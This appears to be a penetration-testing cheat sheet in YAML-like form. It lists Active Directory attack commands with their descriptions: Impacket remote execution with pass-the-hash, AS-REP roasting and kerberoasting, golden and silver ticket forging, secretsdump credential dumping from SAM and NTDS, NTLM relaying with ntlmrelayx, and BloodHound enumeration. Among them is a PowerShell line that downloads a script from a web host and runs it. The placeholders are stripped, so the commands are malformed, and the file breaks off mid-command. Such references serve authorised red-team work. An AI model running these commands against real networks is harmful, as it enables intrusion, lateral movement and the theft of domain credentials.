title: Commands for Fast Memo Shell from Arsenal commands: - cmd: psexec.py /:@ lang: sh tags: impacket, windows, exec desc: PSEXEC with username - cmd: psexec.py -hashes @ lang: sh tags: impacket, windows, exec desc: PSEXEC with pass the Hash (pth) - cmd: export KRB5CCNAME=; psexec.py -dc-ip -target-ip > -no-pass -k /@ lang: sh tags: impacket, windows, exec desc: PSEXEC with kerberos - cmd: smbexec.py /:@ lang: sh tags: impacket, windows, exec desc: SMBEXEC with username - cmd: smbexec.py -hashes @ lang: sh tags: impacket, windows, exec desc: SMBEXEC with pass the Hash (pth) - cmd: export KRB5CCNAME=; smbexec.py -dc-ip -target-ip > -no-pass -k /@ lang: sh tags: impacket, windows, exec desc: SMBEXEC with kerberos - cmd: wmiexec.py /:@ lang: sh tags: impacket, windows, exec desc: wmiexec - cmd: wmiexec.py -hashes @ lang: sh tags: impacket, windows, exec desc: wmiexec with pass the hash (pth) - cmd: atexec.py /:@ "command" lang: sh tags: impacket, windows, exec desc: atexec - execute command view the task scheduler - cmd: atexec.py -hashes @ "command" lang: sh tags: impacket, windows, exec desc: atexec pass the hash (pth) - cmd: smbclient.py /:@ lang: sh tags: impacket, windows, exec desc: smbclient - connect to smb on the target - cmd: GetNPUsers.py / -no-pass -request -format hashcat lang: sh tags: impacket, windows, kerberos, 88 desc: GetNPUsers without password to get TGT (ASREPRoasting) - cmd: GetNPUsers.py -dc-ip / -usersfile -format hashcat lang: sh tags: impacket, windows, kerberos, 88 desc: GetNPUsers - attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ (ASREPRoasting) - cmd: GetUserSPNs.py -request -dc-ip /: lang: sh tags: impacket, windows, kerberos, 88 desc: GetUSERSPN - find Service Principal Names that are associated with a normal user account (kerberoasting) - cmd: goldenPac.py -dc-ip /:''@ lang: sh tags: impacket, windows, kerberos, 88 desc: MS14-068 - goldenPac - cmd: ticketer.py -nthash -domain-sid -domain lang: sh tags: impacket, windows, kerberos, 88 desc: Ticketer - (golden ticket) - generate TGT/TGS tickets into ccache format which can be converted further into kirbi. - cmd: ticketer.py -nthash -domain-sid -domain -spn lang: sh tags: impacket, windows, kerberos, 88 desc: Ticketer - (silver ticket) - generate TGS tickets into ccache format which can be converted further into kirbi. - cmd: ticketConverter.py lang: sh tags: impacket, windows, kerberos, 88 desc: TicketConverter - convert kirbi files (commonly used by mimikatz) into ccache files used by impacket - cmd: getST.py -spn cifs/ /\$ -impersonate lang: sh tags: impacket, windows, kerberos, 88 desc: Silver ticket - impersonate user - cmd: getTGT.py -dc-ip -hashes : / lang: sh tags: impacket, windows, kerberos, 88 desc: GetTGT - request a TGT and save it as ccache for given a password, hash or aesKey - cmd: GetADUsers.py -all /: -dc-ip lang: sh tags: impacket, windows, kerberos, 88 desc: GetADUser - gather data about the domain’s users and their corresponding email addresses - cmd: samrdump.py /:@ lang: sh tags: impacket, windows, kerberos, 88 desc: samrdump - system account, shares, etc... (dump info from the Security Account Manager (SAM)) - cmd: secretsdump.py '/:'@ lang: sh tags: impacket, windows, kerberos, 88 desc: secretsdump - cmd: secretsdump.py -system -sam LOCAL lang: sh tags: impacket, windows, kerberos, 88 desc: secretsdump local dump - extract hash from sam database - cmd: secretsdump.py -ntds -system -hashes LOCAL -outputfile lang: sh tags: impacket, windows, kerberos, 88 desc: secretsdump local dump - extract hash from ntds.dit - cmd: secretsdump.py /\$/@ -no-pass -just-dc-user "Administrator" lang: sh tags: impacket, windows, kerberos, 88 desc: secretsdump - anonymous get administrator - cmd: secretsdump.py -just-dc-ntlm -outputfile /:@ lang: sh tags: impacket, windows, kerberos, 88 desc: secretsdump - remote extract - cmd: secretsdump.py -just-dc -pwd-last-set -user-status -outputfile /:@ lang: sh tags: impacket, windows, kerberos, 88 desc: secretsdump - remote extract + users infos - cmd: smbserver.py lang: sh tags: impacket, windows, kerberos, 88 desc: smbserver - share smb folder - cmd: smbserver.py -username -password lang: sh tags: impacket, windows, kerberos, 88 desc: smbserver - share smb folder with authentication - cmd: ntlmrelayx.py -tf -smb2support -e lang: sh tags: impacket, windows, kerberos, 88 desc: ntlmrelay - host a payload that will automatically be served to the remote host connecting - cmd: ntlmrelayx.py -tf -socks -smb2support lang: sh tags: impacket, windows, kerberos, 88 desc: ntlmrelay - socks - cmd: ntlmrelayx.py -tf -smb2support lang: sh tags: impacket, windows, kerberos, 88 desc: ntlmrelay - authenticate and dump hash - cmd: ntlmrelayx.py -6 -wh -t smb:// -l /tmp -socks -debug lang: sh tags: impacket, windows, kerberos, 88 desc: ntlmrelay - to use with mitm6 - relay to target - cmd: ntlmrelayx.py -t ldaps:// -wh --delegate-access lang: sh tags: impacket, windows, kerberos, 88 desc: ntlmrelay - to use with mitm6 - delegate access - cmd: lookupsid.py /:@ lang: sh tags: impacket, windows, kerberos, 88 desc: lookupsid - SID User Enumeration, extract the information about what users exist and their data. - cmd: reg.py /:@ query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s lang: sh tags: impacket, windows, kerberos, 88 desc: reg - query registry info remotely - cmd: rpcdump.py /:@ lang: sh tags: impacket, windows, kerberos, 88 desc: rpcdump - list rpc endpoint - cmd: services.py /:@ lang: sh tags: impacket, windows, kerberos, 88 desc: services.py - (start, stop, delete, read status, config, list, create and change any service) remote - cmd: getArch.py -target lang: sh tags: impacket, windows, kerberos, 88 desc: getarch - find target architecture (64 or 32 bits) - cmd: netview.py / -target -users lang: sh tags: impacket, windows, kerberos, 88 desc: netview - enumeration tool (ip/shares/sessions/logged users) - need dns set - cmd: python3 scshell.py -service-name -hashes : /@ lang: sh tags: SCShell, psexec, sealthy, DCERPC desc: stealty psexec - cmd: neo4j start lang: bash tags: bloodhound, Active directory enumeration desc: start neo4j server - cmd: bloodhound lang: bash tags: bloodhound, Active directory enumeration desc: bloodhound start IHM - cmd: bloodhound-python -d -u -p -c all lang: bash tags: bloodhound, Active directory enumeration desc: bloodhound - collect data - cmd: bloodhound-python -d -u -p -gc -dc -c all lang: bash tags: bloodhound, Active directory enumeration desc: bloodhound - collect data (alternative) - cmd: import-module sharphound.ps1; invoke-bloodhound -collectionmethod all -domain lang: ps1 tags: bloodhound, Active directory enumeration desc: sharphound - collect bloodhound data - cmd: (new-object system.net.webclient).downloadstring('http:///SharpHound.ps1') | Invoke-BloodHound -CollectionMethod All -domain lang: ps1 tags: bloodhound, Active directory enumeration desc: sharphound - collect bloodhound data download and execute - cmd: cypheroth -u -p -d lang: bash tags: bloodhound, Active directory enumeration desc: cypheroth - start - cmd: aclpwn -f -ft computer -d -dry lang: sh tags: bloodhound, Active directory enumeration desc: aclpwn - from computer to domain - dry run - cmd: certipy find -u @ -p '' -dc-ip lang: sh tags: adcs, certificate, pki, windows, Active directory, template, shadow credential desc: certipy - list certificate templates - cmd: certipy req -u @ -p '' -target -template